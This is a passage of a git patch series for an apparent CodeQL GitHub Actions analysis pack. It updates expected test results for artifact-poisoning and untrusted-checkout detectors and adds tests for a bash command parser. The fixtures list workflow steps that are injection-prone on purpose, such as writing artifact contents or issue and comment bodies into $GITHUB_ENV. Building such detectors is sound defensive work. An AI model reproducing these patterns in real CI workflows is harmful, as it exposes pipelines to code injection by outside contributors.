semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | @@ -67,8 +67,8 @@ subpaths | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 079a89a498c..e1532c06cdc 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | @@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f20fdc79829..85b93765324 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -31,7 +31,7 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | From 531f3d40c010be1d03f114f82ac7643350d311ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:35:09 +0200 Subject: [PATCH 0562/1267] Add tests for new bash parser --- .../.github/workflows/commands.yml | 21 ++ ql/test/library-tests/commands.expected | 206 ++++++++++++++++++ ql/test/library-tests/commands.ql | 4 + .../library-tests/poisonable_steps.expected | 2 - 4 files changed, 231 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/commands.yml create mode 100644 ql/test/library-tests/commands.expected create mode 100644 ql/test/library-tests/commands.ql diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/ql/test/library-tests/.github/workflows/commands.yml new file mode 100644 index 00000000000..11ef1a60d31 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/commands.yml @@ -0,0 +1,21 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: | + command1 ; command2 + - run: | + command3 | command4 + - run: | + command5 "$(command6)" + - run: | + command7 && command8 + - run: | + command9 || command10 + - run: | + command11 "`command12`" + - run: | + command13 "`command14` $(date | wc -l)" + diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected new file mode 100644 index 00000000000..17b8b982a71 --- /dev/null +++ b/ql/test/library-tests/commands.expected @@ -0,0 +1,206 @@ +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command1 | +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command2 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command3 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command4 | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command5 "SUBCOMMAND" | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command6 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command7 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command8 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command9 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command10 | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command11 "SUBCOMMAND" | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command12 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command13 "SUBCOMMAND SUBCOMMAND" | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command14 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | date | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | wc -l | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/ql/test/library-tests/commands.ql b/ql/test/library-tests/commands.ql new file mode 100644 index 00000000000..a13608145cf --- /dev/null +++ b/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getACommand() diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 0cd71f96ea9..100eddb1400 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,6 +1,4 @@ -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | From 68da4823529d4084cb953d7a3950f4d05555af14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:36:49 +0200 Subject: [PATCH 0563/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files 